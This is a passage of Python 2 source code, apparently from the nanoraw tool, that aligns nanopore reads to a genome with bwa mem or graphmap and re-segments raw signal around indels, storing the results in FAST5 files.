corr_subgrp.attrs['scale'] = scale_values.scale
corr_subgrp.attrs['lower_lim'] = scale_values.lower_lim
corr_subgrp.attrs['upper_lim'] = scale_values.upper_lim
corr_subgrp.attrs['norm_type'] = norm_type
corr_subgrp.attrs['outlier_threshold'] = outlier_thresh
# store alignment statistics
corr_alignment = corr_subgrp.create_group('Alignment')
corr_alignment.attrs['mapped_start'] = genome_location.Start
corr_alignment.attrs['mapped_strand'] = genome_location.Strand
corr_alignment.attrs['mapped_chrom'] = genome_location.Chrom
corr_alignment.attrs['clipped_bases_start'] = read_info.ClipStart
corr_alignment.attrs['clipped_bases_end'] = read_info.ClipEnd
corr_alignment.attrs['num_insertions'] = read_info.Insertions
corr_alignment.attrs['num_deletions'] = read_info.Deletions
corr_alignment.attrs['num_matches'] = read_info.Matches
corr_alignment.attrs['num_mismatches'] = read_info.Mismatches
corr_alignment.create_dataset(
'read_alignment', data=np_read_align, compression="gzip")
corr_alignment.create_dataset(
'genome_alignment', data=np_genome_align, compression="gzip")
# store old segmentation in order to plot "correction process"
corr_alignment.create_dataset(
'read_segments', data=old_segs, compression="gzip")
# Add Events to data frame with event means, SDs and lengths
corr_events = corr_subgrp.create_dataset(
'Events', data=event_data, compression="gzip")
corr_events.attrs[
'read_start_rel_to_raw'] = read_start_rel_to_raw
except:
raise NotImplementedError, (
'Error writing resquiggle information back into fast5 file.')
try:
read_data.flush()
read_data.close()
except:
raise NotImplementedError, (
'Error closing fast5 file after writing resquiggle ' +
'information.')
return
def get_indel_groups(
alignVals, align_segs, raw_signal, min_seg_len, timeout,
num_cpts_limit):
def get_all_indels():
# get genomic sequence for and between each indel
read_align = ''.join(zip(*alignVals)[0])
genome_align = ''.join(zip(*alignVals)[1])
genome_gaps = [(m.start(), m.end()) for m in
GAP_PAT.finditer(genome_align)]
read_gaps = [(m.start(), m.end())
for m in GAP_PAT.finditer(read_align)]
all_indel_locs = sorted(
genome_gaps + read_gaps +
[(0,0), (len(read_align), len(read_align))])
btwn_indel_seqs = [
genome_align[m_start:m_end] for m_start, m_end in
zip(zip(*all_indel_locs)[1][:-1],
zip(*all_indel_locs)[0][1:])]
# is each indel an ins(ertion) or deletion
all_is_ins = [read_align[start:end].startswith('-')
for start, end in all_indel_locs[1:-1]]
indel_seqs = [
genome_align[start:end]
if is_ins else read_align[start:end]
for is_ins, (start, end) in
zip(all_is_ins, all_indel_locs[1:-1])]
# loop over indels along with sequence before and after in
# order to check for ambiguous indels
unambig_indels = []
curr_read_len = len(btwn_indel_seqs[0])
for indel_seq, before_seq, after_seq, is_ins in zip(
indel_seqs, btwn_indel_seqs[:-1], btwn_indel_seqs[1:],
all_is_ins):
indel_len = len(indel_seq)
# if this is an insertion then don't include indel in
# length to end of indel
# also extend indel end by 1 in order to check for new
# breakpoints for neighboring segemnts
indel_end = curr_read_len + 1 if is_ins else \
curr_read_len + indel_len + 1
indel_diff = indel_len if is_ins else -1 * indel_len
# indel without ambiguity correction
# indelStats(curr_read_len - 1, indel_end, indel_diff)
# extend ambiguous indels
# only extend up to one position before beginning or end
# as a one base pad is added outside of indel
u, d = -1, 0
while(d < len(after_seq) - 1 and
indel_seq[d%indel_len] == after_seq[d]):
d += 1
while(u * -1 <= len(before_seq) - 1 and
indel_seq[(u%indel_len)-indel_len] == before_seq[u]):
u -= 1
unambig_indels.append(indelStats(
curr_read_len + u, indel_end + d, indel_diff))
if not is_ins:
curr_read_len += indel_len
curr_read_len += len(after_seq)
return unambig_indels
def extend_group(indel_group):
group_start = min(indel.start for indel in indel_group)
group_stop = max(indel.end for indel in indel_group)
num_cpts = sum(indel.diff for indel in indel_group
) + group_stop - group_start - 1
# check that there are enough points to split
# add an extra set of values to ensure no zero changepoint
while align_segs[group_stop] - align_segs[group_start] < (
num_cpts + 2) * min_seg_len:
num_cpts += int(group_start > 0) + int(
group_stop < len(align_segs) - 1)
group_start = max(0, group_start - 1)
group_stop = min(len(align_segs) - 1, group_stop + 1)
return group_start, group_stop, num_cpts
def extend_and_join(indel_group):
group_start, group_stop, num_cpts = extend_group(indel_group)
# check if the extension hits the previous group
while (len(indel_groups) > 0) and (
group_start <= indel_groups[-1].end):
indel_group = indel_groups[-1].indels + indel_group
del indel_groups[-1]
group_start, group_stop, num_cpts = extend_group(
indel_group)
return group_start, group_stop, num_cpts, indel_group
def get_cpts(group_start, group_stop, num_cpts):
"""
Get changepoints where the raw difference between min_seg_len
obs to the left and min_seg_len obs to the right is largest
while maintaining the min_seg_len between changepoints.
Still need to test this function for off by one bugs etc.
"""
if num_cpts_limit is not None and num_cpts > num_cpts_limit:
raise RuntimeError, ('Reached maximum number of ' +
'changepoints for a single indel')
sig_cs = raw_signal[align_segs[group_start]:
align_segs[group_stop]]
sig_cs = np.cumsum(np.insert(sig_cs, 0, 0))
# get difference between all neighboring min_seg_len regions
running_diffs = np.abs((2 * sig_cs[min_seg_len:-min_seg_len]) -
sig_cs[:-2*min_seg_len] -
sig_cs[2*min_seg_len:])
cpts = []
blacklist_pos = set()
for pos in running_diffs.argsort()[::-1]:
if pos not in blacklist_pos:
cpts.append(pos)
blacklist_pos.update(range(
pos-min_seg_len+1, pos+min_seg_len+1))
if len(cpts) == num_cpts:
break
if len(cpts) < num_cpts:
return None
return sorted([cpt + min_seg_len for cpt in cpts])
def extend_for_cpts(
group_start, group_stop, num_cpts, indel_group):
cpts = get_cpts(group_start, group_stop, num_cpts)
# There is a bug in the changepoint package that allows a zero
# width first segment. If one is present extend the region and
# find cpts again
while cpts is None or cpts[0] == 0:
num_cpts += int(group_start > 0) + int(
group_stop < len(align_segs) - 1)
group_start = max(0, group_start - 1)
group_stop = min(len(align_segs) - 1, group_stop + 1)
while (len(indel_groups) > 0) and (
group_start <= indel_groups[-1].end):
indel_group = indel_groups[-1].indels + indel_group
del indel_groups[-1]
group_start, group_stop, num_cpts = extend_group(
indel_group)
cpts = get_cpts(group_start, group_stop, num_cpts)
return [x + align_segs[group_start]
for x in cpts], group_start, group_stop, indel_group
if timeout is not None:
timeout_start = time()
# sort indels in order of start positions
all_indels = get_all_indels()
if len(all_indels) == 0:
return []
indel_groups = []
curr_group = [all_indels[0],]
for indel in all_indels[1:]:
if timeout is not None and time() - timeout_start > timeout:
raise RuntimeError, 'Read took too long to re-segment.'
# check if indel hits current group
if max(g_indel.end for g_indel in curr_group) >= indel.start:
curr_group.append(indel)
else:
(curr_start, curr_stop, num_cpts,
curr_group) = extend_and_join(curr_group)
cpts, curr_start, curr_stop, curr_group = extend_for_cpts(
curr_start, curr_stop, num_cpts, curr_group)
# if the indel group still reaches the next indel
if curr_stop >= indel.start:
curr_group.append(indel)
else:
indel_groups.append(indelGroupStats(
curr_start, curr_stop, cpts, curr_group))
curr_group = [indel,]
# handle the last indel group if it is not yet included
if len(indel_groups) == 0 or \
indel_groups[-1].indels[-1] != all_indels[-1]:
curr_start, curr_stop, num_cpts, curr_group = extend_and_join(
curr_group)
cpts, curr_start, curr_stop, curr_group = extend_for_cpts(
curr_start, curr_stop, num_cpts, curr_group)
indel_groups.append(indelGroupStats(
curr_start, curr_stop, cpts, curr_group))
return indel_groups
def resquiggle_read(
fast5_fn, read_start_rel_to_raw, starts_rel_to_read,
norm_type, outlier_thresh, alignVals,
timeout, num_cpts_limit, genome_loc, read_info,
basecall_group, corrected_group, compute_sd, pore_model,
min_event_obs=4, in_place=True):
# errors should not happen here since these slotes were checked
# in alignment function, but old zombie processes might cause
# problems here
try:
fast5_data = h5py.File(fast5_fn, 'r')
channel_info = nh.get_channel_info(fast5_data)
# extract raw data for this read
all_raw_signal = fast5_data[
'/Raw/Reads/'].values()[0]['Signal'].value
event_means, event_kmers = None, None
if norm_type == 'pA':
event_data = fast5_data[
'/Analyses/' + basecall_group + '/' +
read_info.Subgroup + '/Events'].value
event_means = event_data['mean']
event_kmers = event_data['model_state']
fast5_data.close()
except:
raise NotImplementedError, (
'Error opening file for re-squiggle. This should have ' +
'been caught during the alignment phase. Check that there ' +
'are no other nanoraw processes or processes accessing ' +
'these HDF5 files running simultaneously.')
# normalize signal
# print read id for resquiggle shift and scale output
#sys.stdout.write(read_info.ID + "\t")
norm_signal, scale_values = nh.normalize_raw_signal(
all_raw_signal, read_start_rel_to_raw, starts_rel_to_read[-1],
norm_type, channel_info, outlier_thresh, pore_model=pore_model,
event_means=event_means, event_kmers=event_kmers)
# group indels that are adjacent for re-segmentation
indel_groups = get_indel_groups(
alignVals, starts_rel_to_read, norm_signal, min_event_obs,
timeout, num_cpts_limit)
new_segs = []
prev_stop = 0
for group_start, group_stop, cpts, group_indels in indel_groups:
## add segments from last indel to this one and new segments
new_segs.append(
np.append(starts_rel_to_read[prev_stop:group_start+1],
cpts))
prev_stop = group_stop
# handle end of read
new_segs.append(starts_rel_to_read[prev_stop:])
new_segs = np.concatenate(new_segs)
if min(np.diff(new_segs)) < 1:
raise NotImplementedError, (
'New segments include zero length events.')
if new_segs[0] < 0:
raise NotImplementedError, (
'New segments start with negative index.')
if new_segs[-1] > norm_signal.shape[0]:
raise NotImplementedError, (
'New segments end past raw signal values.')
# get just from alignVals
align_seq = ''.join(zip(*alignVals)[1]).replace('-', '')
if new_segs.shape[0] != len(align_seq) + 1:
raise ValueError, ('Aligned sequence does not match number ' +
'of segments produced.')
if in_place:
# create new hdf5 file to hold new read signal
write_new_fast5_group(
fast5_fn, genome_loc, read_info,
read_start_rel_to_raw, new_segs, align_seq, alignVals,
starts_rel_to_read, norm_signal, scale_values,
corrected_group, read_info.Subgroup, norm_type,
outlier_thresh, compute_sd)
else:
# create new hdf5 file to hold corrected read events
pass
return
def resquiggle_worker(
basecalls_q, failed_reads_q, basecall_group, corrected_group,
norm_type, outlier_thresh, timeout, num_cpts_limit, compute_sd,
pore_model):
num_processed = 0
while True:
try:
fast5_fn, sgs_align_data = basecalls_q.get(block=False)
# None values placed in queue when all files have
# been processed
if fast5_fn is None: break
except Queue.Empty:
sleep(1)
continue
num_processed += 1
if VERBOSE and num_processed % 100 == 0:
sys.stderr.write('.')
sys.stderr.flush()
# process different read subgroups separately so that the same
# file is never open simultaneously
for align_data in sgs_align_data:
(alignVals, genome_loc, starts_rel_to_read,
read_start_rel_to_raw, read_info) = align_data
try:
resquiggle_read(
fast5_fn, read_start_rel_to_raw, starts_rel_to_read,
norm_type, outlier_thresh, alignVals,
timeout, num_cpts_limit, genome_loc, read_info,
basecall_group, corrected_group, compute_sd,
pore_model)
except Exception as e:
# uncomment to identify mysterious errors
#raise
failed_reads_q.put((
str(e), read_info.Subgroup + ' :: ' + fast5_fn))
return
############################################
########## Genomic Alignment Code ##########
############################################
def fix_raw_starts_for_clipped_bases(
start_clipped_bases, end_clipped_bases, starts_rel_to_read,
read_start_rel_to_raw):
if start_clipped_bases > 0:
start_clipped_obs = starts_rel_to_read[start_clipped_bases]
starts_rel_to_read = starts_rel_to_read[
start_clipped_bases:] - start_clipped_obs
read_start_rel_to_raw += start_clipped_obs
if end_clipped_bases > 0:
starts_rel_to_read = starts_rel_to_read[
:-1 * end_clipped_bases]
return starts_rel_to_read, read_start_rel_to_raw
def fix_all_clipped_bases(batch_align_data, batch_reads_data):
clip_fix_align_data = []
for read_fn_sg, (
alignVals, genome_loc, start_clipped_bases,
end_clipped_bases) in batch_align_data.iteritems():
(read_start_rel_to_raw, starts_rel_to_read, basecalls,
channel_info, read_id) = batch_reads_data[read_fn_sg]
# fix raw start positions to match bases clipped in mapping
starts_rel_to_read, read_start_rel_to_raw \
= fix_raw_starts_for_clipped_bases(
start_clipped_bases, end_clipped_bases,
starts_rel_to_read, read_start_rel_to_raw)
bc_subgroup, fast5_fn = read_fn_sg.split(':::')
num_ins, num_del, num_match, num_mismatch = 0, 0, 0, 0
for rb, gb in alignVals:
if rb == '-':
num_del += 1
elif gb == '-':
num_ins += 1
elif rb == gb:
num_match += 1
else:
num_mismatch += 1
read_info = readInfo(
read_id, bc_subgroup, start_clipped_bases, end_clipped_bases,
num_ins, num_del, num_match, num_mismatch)
clip_fix_align_data.append((fast5_fn, (
alignVals, genome_loc, starts_rel_to_read,
read_start_rel_to_raw, read_info)))
return clip_fix_align_data
def clip_m5_alignment(alignVals, start, strand, chrm):
# clip read to first matching bases
start_clipped_read_bases = 0
start_clipped_genome_bases = 0
start_clipped_align_bases = 0
r_base, g_base = alignVals[0]
while r_base == '-' or g_base == '-':
start_clipped_read_bases += int(r_base != '-')
start_clipped_genome_bases += int(g_base != '-')
start_clipped_align_bases += 1
r_base, g_base = alignVals[start_clipped_align_bases]
end_clipped_read_bases = 0
end_clipped_genome_bases = 0
end_clipped_align_bases = 0
r_base, g_base = alignVals[-1]
while r_base == '-' or g_base == '-':
end_clipped_read_bases += int(r_base != '-')
end_clipped_genome_bases += int(g_base != '-')
end_clipped_align_bases += 1
r_base, g_base = alignVals[-1 * (end_clipped_align_bases + 1)]
alignVals = alignVals[start_clipped_align_bases:]
if end_clipped_align_bases > 0:
alignVals = alignVals[:-1*end_clipped_align_bases]
if strand == '+' and start_clipped_genome_bases > 0:
genome_loc = genomeLoc(
start + start_clipped_genome_bases, '+', chrm)
elif strand == '-' and end_clipped_genome_bases > 0:
genome_loc = genomeLoc(
start + end_clipped_genome_bases, '-', chrm)
else:
genome_loc = genomeLoc(start, strand, chrm)
return alignVals, start_clipped_read_bases, \
end_clipped_read_bases, genome_loc
def parse_m5_record(r_m5_record):
if r_m5_record['tStrand'] != '+':
raise NotImplementedError, (
'Mapping indicates negative strand reference mapping.')
if r_m5_record['qStrand'] == "+":
alignVals = zip(r_m5_record['qAlignedSeq'],
r_m5_record['tAlignedSeq'])
else:
alignVals = zip(nh.rev_comp(r_m5_record['qAlignedSeq']),
nh.rev_comp(r_m5_record['tAlignedSeq']))
alignVals, start_clipped_bases, end_clipped_bases, genome_loc \
= clip_m5_alignment(
alignVals, int(r_m5_record['tStart']),
r_m5_record['qStrand'], r_m5_record['tName'])
return (alignVals, genome_loc, start_clipped_bases,
end_clipped_bases)
def parse_m5_output(align_output, batch_reads_data):
alignments = dict(
(read_fn_sg, None) for read_fn_sg in batch_reads_data.keys())
for line in align_output:
r_m5_record = dict(zip(M5_FIELDS, line.strip().split()))
if len(r_m5_record) != len(M5_FIELDS):
continue
# store the alignment if none is stored for this read or
# if this read has the lowest map quality thus far
if alignments[r_m5_record['qName']] is None or \
int(alignments[r_m5_record['qName']]['score']) < \
int(r_m5_record['score']):
alignments[r_m5_record['qName']] = r_m5_record
batch_align_failed_reads = []
batch_align_data = {}
for read_fn_sg, r_m5_record in alignments.iteritems():
if r_m5_record is None:
batch_align_failed_reads.append(
('Alignment not produced.', read_fn_sg))
else:
try:
batch_align_data[read_fn_sg] = parse_m5_record(
r_m5_record)
except Exception as e:
batch_align_failed_reads.append((str(e), read_fn_sg))
return batch_align_failed_reads, batch_align_data
def parse_sam_record(r_sam_record, genome_index):
# parse cigar string
cigar = [
(int(reg_len), reg_type) for reg_len, reg_type in
CIGAR_PAT.findall(r_sam_record['cigar'])]
if len(cigar) < 1:
raise RuntimeError, 'Invalid cigar string produced.'
strand = '-' if int(r_sam_record['flag']) & 0x10 else '+'
if strand == '-':
cigar = cigar[::-1]
# record clipped bases and remove from query seq as well as cigar
qSeq = r_sam_record['seq'] if strand == '+' else nh.rev_comp(
r_sam_record['seq'])
start_clipped_bases = 0
end_clipped_bases = 0
# handle clipping elements (H and S)
if cigar[0][1] == 'H':
start_clipped_bases += cigar[0][0]
cigar = cigar[1:]
if cigar[-1][1] == 'H':
end_clipped_bases += cigar[-1][0]
cigar = cigar[:-1]
if cigar[0][1] == 'S':
start_clipped_bases += cigar[0][0]
qSeq = qSeq[cigar[0][0]:]
cigar = cigar[1:]
if cigar[-1][1] == 'S':
end_clipped_bases += cigar[-1][0]
qSeq = qSeq[:-cigar[-1][0]]
cigar = cigar[:-1]
tLen = sum([reg_len for reg_len, reg_type in cigar
if reg_type in 'MDN=X'])
tSeq = genome_index[r_sam_record['rName']][
int(r_sam_record['pos']) - 1:
int(r_sam_record['pos']) + tLen - 1]
if strand == '-': tSeq = nh.rev_comp(tSeq)
# check that cigar starts and ends with matched bases
while cigar[0][1] not in 'M=X':
if cigar[0][1] in 'IP':
tSeq = tSeq[cigar[0][0]:]
else:
qSeq = qSeq[cigar[0][0]:]
start_clipped_bases += cigar[0][0]
cigar = cigar[1:]
while cigar[-1][1] not in 'M=X':
if cigar[-1][1] in 'IP':
tSeq = tSeq[:-cigar[-1][0]]
else:
qSeq = qSeq[:-cigar[-1][0]]
end_clipped_bases += cigar[0][0]
cigar = cigar[:-1]
qLen = sum([reg_len for reg_len, reg_type in cigar
if reg_type in 'MIP=X'])
assert len(qSeq) == qLen, 'Read sequence from SAM and ' + \
'cooresponding cigar string do not agree.'
# create pairwise alignment via zipped pairs
alignVals = []
for reg_len, reg_type in cigar:
if reg_type in 'M=X':
alignVals.extend(zip(qSeq[:reg_len], tSeq[:reg_len]))
qSeq = qSeq[reg_len:]
tSeq = tSeq[reg_len:]
elif reg_type in 'IP':
alignVals.extend(zip(qSeq[:reg_len], repeat('-')))
qSeq = qSeq[reg_len:]
else:
alignVals.extend(zip(repeat('-'), tSeq[:reg_len]))
tSeq = tSeq[reg_len:]
return (alignVals, genomeLoc(
int(r_sam_record['pos']) - 1, strand, r_sam_record['rName']),
start_clipped_bases, end_clipped_bases)
def parse_sam_output(align_output, batch_reads_data, genome_index):
# create dictionary with empty slot to each read
alignments = dict(
(read_fn_sg, None) for read_fn_sg in batch_reads_data.keys())
for line in align_output:
if line.startswith('@'): continue
r_sam_record = dict(zip(SAM_FIELDS, line.strip().split()))
if len(r_sam_record) < len(SAM_FIELDS): continue
if r_sam_record['rName'] == '*': continue
# store the alignment if none is stored for this read or
# if this read has the lowest map quality thus far
qName = r_sam_record['qName'].replace('|||', ' ')
if alignments[qName] is None or \
int(alignments[qName]['mapq']) < \
int(r_sam_record['mapq']):
alignments[qName] = r_sam_record
batch_align_failed_reads = []
batch_align_data = {}
for read_fn_sg, r_sam_record in alignments.iteritems():
if r_sam_record is None:
batch_align_failed_reads.append(
('Alignment not produced. Potentially failed ' +
'to locate BWA index files.', read_fn_sg))
else:
try:
batch_align_data[read_fn_sg] = parse_sam_record(
r_sam_record, genome_index)
except Exception as e:
batch_align_failed_reads.append((str(e), read_fn_sg))
return batch_align_failed_reads, batch_align_data
def prep_graphmap_options(
genome_fn, read_fn, out_fn, output_format, num_align_ps):
return ['align', '-r', genome_fn, '-d', read_fn, '-o', out_fn,
'-L', output_format, '-t', str(num_align_ps)]
def prep_bwa_mem_options(genome_fn, read_fn, num_align_ps):
return ['mem', '-x', 'ont2d', '-v', '1', '-t', str(num_align_ps),
genome_fn, read_fn]
def align_to_genome(batch_reads_data, genome_fn, mapper_exe,
mapper_type, genome_index, num_align_ps,
output_format='sam'):
# prepare fasta text with batch reads
batch_reads_fasta = ''
for read_fn_sg, (_, _, basecalls, _, _) in \
batch_reads_data.iteritems():
# note spaces aren't allowed in read names so replace with
# vertical bars and undo to retain file names
batch_reads_fasta += ">" + read_fn_sg.replace(' ', '|||') + \
'\n' + ''.join(basecalls) + '\n'
read_fp = NamedTemporaryFile(suffix='.fasta')
read_fp.write(batch_reads_fasta)
read_fp.flush()
out_fp = NamedTemporaryFile()
# optionally suppress output from mapper with devnull sink
with open(os.devnull, 'w') as FNULL:
if mapper_type == 'graphmap':
mapper_options = prep_graphmap_options(
genome_fn, read_fp.name, out_fp.name,
output_format, num_align_ps)
stdout_sink = FNULL
elif mapper_type == 'bwa_mem':
mapper_options = prep_bwa_mem_options(
genome_fn, read_fp.name, num_align_ps)
stdout_sink = out_fp
else:
raise RuntimeError, 'Mapper not supported.'
try:
exitStatus = call([mapper_exe,] + mapper_options,
stdout=stdout_sink, stderr=FNULL)
out_fp.seek(0)
align_output = out_fp.readlines()
# close files here so that they persist until
# after basecalling is finished
read_fp.close()
out_fp.close()
except:
# whole mapping call failed so all reads failed
return ([(
'Problem running/parsing genome mapper. ' +
'Ensure you have a compatible version installed.' +
'Potentially failed to locate BWA index files.',
read_fn_sg) for read_fn_sg
in batch_reads_data.keys()], [])
if output_format == 'sam':
batch_parse_failed_reads, batch_align_data = parse_sam_output(
align_output, batch_reads_data, genome_index)
elif output_format == 'm5':
batch_parse_failed_reads, batch_align_data = parse_m5_output(
align_output, batch_reads_data)
else:
raise RuntimeError, 'Mapper output type not supported.'
clip_fix_align_data = fix_all_clipped_bases(
batch_align_data, batch_reads_data)
return batch_parse_failed_reads, clip_fix_align_data
def fix_stay_states(
called_dat, starts_rel_to_read, basecalls,
read_start_rel_to_raw):
move_states = called_dat['move'][1:] > 0
start_clip = 0
event_change_state = move_states[0]
while not event_change_state:
if start_clip >= len(move_states) - 2:
raise RuntimeError, (
'Read is composed entirely of stay model ' +
'states and cannot be processed')
start_clip += 1
event_change_state = move_states[start_clip]
end_clip = 0
event_change_state = move_states[-1]
while not event_change_state:
end_clip += 1
event_change_state = move_states[-(end_clip+1)]
# clip all applicable data structures
move_states = move_states[start_clip:]
starts_rel_to_read = starts_rel_to_read[start_clip:]
basecalls = basecalls[start_clip:]
if end_clip > 0:
move_states = move_states[:-end_clip]
starts_rel_to_read = starts_rel_to_read[:-end_clip]
basecalls = basecalls[:-end_clip]
if start_clip > 0:
start_clip_obs = starts_rel_to_read[0]
starts_rel_to_read = starts_rel_to_read - start_clip_obs
read_start_rel_to_raw += start_clip_obs
# now actually remove internal stay states
move_states = np.insert(
move_states, (0, len(move_states) - 1), True)
starts_rel_to_read = starts_rel_to_read[move_states]
basecalls = basecalls[move_states[:-1]]
return starts_rel_to_read, basecalls, read_start_rel_to_raw
def get_read_data(fast5_fn, basecall_group, basecall_subgroup):
try:
fast5_data = h5py.File(fast5_fn, 'r')
except:
raise NotImplementedError, (
'Error opening file for alignment. This should have ' +
'been caught during the HDF5 prep phase. Check that there ' +
'are no other nanoraw processes or processes accessing ' +
'these HDF5 files running simultaneously.')
try:
# get albacore version, or if not specified set to 0.0
albacore_version = LooseVersion(fast5_data[
'/Analyses/' + basecall_group].attrs['version']
if 'version' in fast5_data['/Analyses/' +
basecall_group].attrs else "0.0")
called_dat = fast5_data[
'/Analyses/' + basecall_group + '/' + basecall_subgroup +
'/Events'].value
except:
raise RuntimeError, (
'No events or corrupted events in file. Likely a ' +
'segmentation error or mis-specified basecall-' +
'subgroups (--2d?).')
try:
raw_attrs = dict(
fast5_data['/Raw/Reads/'].values()[0].attrs.items())
except:
raise RuntimeError, (
'Raw data is not stored in Raw/Reads/Read_[read#] so ' +
'new segments cannot be identified.')
try:
channel_info = nh.get_channel_info(fast5_data)
fast5_data.close()
except:
raise RuntimeError, (
'Error getting channel information and closing fast5 file.')
read_id = raw_attrs['read_id']
abs_event_start = np.round(
called_dat['start'][0].astype(np.float64) *
channel_info.sampling_rate).astype(np.uint64)
if abs_event_start < raw_attrs['start_time']:
# allow off by one or two values as these are floating point
# errors in start time values
if abs_event_start >= raw_attrs['start_time'] - 2:
read_start_rel_to_raw = 0
else:
raise NotImplementedError, (
'Events appear to start before the raw signal.')
else:
read_start_rel_to_raw = int(
abs_event_start - raw_attrs['start_time'])
# check albacore version to determine which method to extract starts
# relative to the read.
# Before albacore version 1.0, events could be skipped so start times
# should be used. Since then events are not removed so the length
# slot is more reliable since it will have greater floating point
# precision. Relevant discussion on community forum here:
# https://community.nanoporetech.com/posts/albacore-zero-length-even
# TODO: Once albacore stores integer values here another case
# will be added here
if albacore_version > LooseVersion("1.0"):
# compute event starts from length slot as start slot is less
# reliable due to storage as a float32
starts_rel_to_read = np.cumsum(np.concatenate(
[[0,], np.round(called_dat['length'] *
channel_info.sampling_rate).astype('int_')]))
else:
last_event = called_dat[-1]
# convert starts to float64 to minimize floating point errors
starts_rel_to_read = np.append(
called_dat['start'], last_event['start'] +
last_event['length']).astype(np.float64)
# round to float64 to minimize floating point errors
starts_rel_to_read = np.round(
starts_rel_to_read *
channel_info.sampling_rate).astype('int_') - abs_event_start
basecalls = np.array([
event_state[2] for event_state in called_dat['model_state']])
if any(len(vals) <= 1 for vals in (
starts_rel_to_read, basecalls,
called_dat['model_state'])):
raise NotImplementedError, (
'One or no segments or signal present in read.')
if min(np.diff(starts_rel_to_read)) < 1:
raise NotImplementedError, (
'Zero length event present in input data.')
# remove stay states from the base caller
(starts_rel_to_read, basecalls,
read_start_rel_to_raw) = fix_stay_states(
called_dat, starts_rel_to_read, basecalls,
read_start_rel_to_raw)
return (read_start_rel_to_raw, starts_rel_to_read, basecalls,
channel_info, read_id)
def align_and_parse(
fast5s_to_process, genome_fn, mapper_exe, mapper_type,
genome_index, basecall_group, basecall_subgroups, num_align_ps):
batch_reads_data = {}
batch_get_data_failed_reads = []
for fast5_fn in fast5s_to_process:
for bc_subgroup in basecall_subgroups:
try:
read_data = get_read_data(
fast5_fn, basecall_group, bc_subgroup)
batch_reads_data[
bc_subgroup + ':::' + fast5_fn] = read_data
except Exception as e:
# uncomment to identify mysterious errors
#raise
batch_get_data_failed_reads.append((
str(e), bc_subgroup + ':::' + fast5_fn))
batch_align_failed_reads, batch_align_data = align_to_genome(
batch_reads_data, genome_fn, mapper_exe, mapper_type,
genome_index, num_align_ps)
# regroup reads by filename (for 2D reads to be processed together
# and avoid the same HDF5 file being opened simultaneuously)
fn_batch_align_data = defaultdict(list)
for fast5_fn, sg_align_data in batch_align_data:
fn_batch_align_data[fast5_fn].append(sg_align_data)
# uncomment to identify mysterious errors
#print "Get data errors: " + str(batch_get_data_failed_reads)
#print "Align read errors: " + str(batch_align_failed_reads)
return (batch_get_data_failed_reads + batch_align_failed_reads,
fn_batch_align_data)
def prep_fast5(fast5_fn, basecall_group, corrected_group,
overwrite, in_place):
# several checks to prepare the FAST5 file for correction before
# processing to save compute
if not in_place:
return ('Not currently implementing new hdf5 file writing.',
fast5_fn)
# check that the file is writeable before trying to correct
if not os.access(fast5_fn, os.W_OK):
return ('FAST5 file is not writable.', fast5_fn)
try:
with h5py.File(fast5_fn, 'r') as read_data:
if '/Analyses/' + basecall_group not in read_data:
return (
'FAST5 basecall-group or Analyses group does ' +
'not exist. Likely these reads either have not ' +
'been basecalled (with event storage) or are mux ' +
'scan files. Also check --basecall-group and ' +
'--basecall-subgroups arguments against these ' +
'files.', fast5_fn)
if not overwrite and '/Analyses/' + corrected_group \
in read_data:
return (
"Raw genome corrected data exists for " +
"this read and --overwrite is not set.", fast5_fn)
except:
return ('Error opening file. Likely a corrupted file.',
fast5_fn)
try:
# create group to store data
with h5py.File(fast5_fn, 'r+') as read_data:
analyses_grp = read_data['/Analyses']
# check for previously created correction group and
# delete if it exists
if corrected_group in analyses_grp:
del analyses_grp[corrected_group]
corr_grp = analyses_grp.create_group(corrected_group)
corr_grp.attrs['nanoraw_version'] = nh.NANORAW_VERSION
corr_grp.attrs['basecall_group'] = basecall_group
except:
return (
'Error creating new fast5 group or writing to fast5 file.',
fast5_fn)
return
def align_reads(
fast5_batch, genome_fn, mapper_exe, mapper_type, genome_index,
basecall_group, basecall_subgroups, corrected_group,
basecalls_q, overwrite, num_align_ps, in_place=True):
batch_prep_failed_reads = []
fast5s_to_process = []
for fast5_fn in fast5_batch:
prep_result = prep_fast5(
fast5_fn, basecall_group, corrected_group,
overwrite, in_place)
if prep_result is None:
fast5s_to_process.append(fast5_fn)
else:
batch_prep_failed_reads.append(prep_result)
batch_align_failed_reads, batch_align_data = align_and_parse(
fast5s_to_process, genome_fn, mapper_exe, mapper_type,
genome_index, basecall_group, basecall_subgroups, num_align_ps)
for fast5_fn, sgs_align_data in batch_align_data.iteritems():
basecalls_q.put((fast5_fn, sgs_align_data))
# uncomment to identify mysterious errors
#print "Prep reads fail: " + str(batch_prep_failed_reads)
#print "Align reads fail: " + str(batch_align_failed_reads)
return batch_prep_failed_reads + batch_align_failed_reads
def alignment_worker(
fast5_q, basecalls_q, failed_reads_q, genome_fn,
mapper_exe, mapper_type, basecall_group, basecall_subgroups,
corrected_group, overwrite, num_align_ps):
# this is only needed for sam output format (not m5)
genome_index = nh.parse_fasta(genome_fn)
while not fast5_q.empty():
try:
fast5_batch = fast5_q.get(block=False)
except Queue.Empty:
break
batch_failed_reads = align_reads(
fast5_batch, genome_fn, mapper_exe, mapper_type,
genome_index, basecall_group, basecall_subgroups,
corrected_group, basecalls_q, overwrite, num_align_ps)
for failed_read in batch_failed_reads:
failed_reads_q.put(failed_read)
return
def resquiggle_all_reads(
fast5_fns, genome_fn, mapper_exe, mapper_type,
basecall_group, basecall_subgroups, corrected_group, norm_type,
outlier_thresh, timeout, num_cpts_limit, overwrite,
align_batch_size, num_align_ps, align_threads_per_proc,
num_resquiggle_ps, compute_sd, pore_model):
manager = mp.Manager()
fast5_q = manager.Queue()
# set maximum number of parsed basecalls to sit in the middle queue
basecalls_q = manager.Queue(
align_batch_size * ALIGN_BATCH_MULTIPLIER)
failed_reads_q = manager.Queue()
num_reads = 0
fast5_batch = []
for fast5_fn in fast5_fns:
num_reads += 1
fast5_batch.append(fast5_fn)
# put batches of reads in queue
if num_reads % align_batch_size == 0:
fast5_q.put(fast5_batch)
fast5_batch = []
if len(fast5_batch) > 0:
fast5_q.put(fast5_batch)
align_args = (
fast5_q, basecalls_q, failed_reads_q, genome_fn,
mapper_exe, mapper_type, basecall_group, basecall_subgroups,
corrected_group, overwrite, align_threads_per_proc)
align_ps = []
for p_id in xrange(num_align_ps):
p = mp.Process(target=alignment_worker, args=align_args)
p.start()
align_ps.append(p)
rsqgl_args = (basecalls_q, failed_reads_q, basecall_group,
corrected_group, norm_type, outlier_thresh, timeout,
num_cpts_limit, compute_sd, pore_model)
resquiggle_ps = []
for p_id in xrange(num_resquiggle_ps):
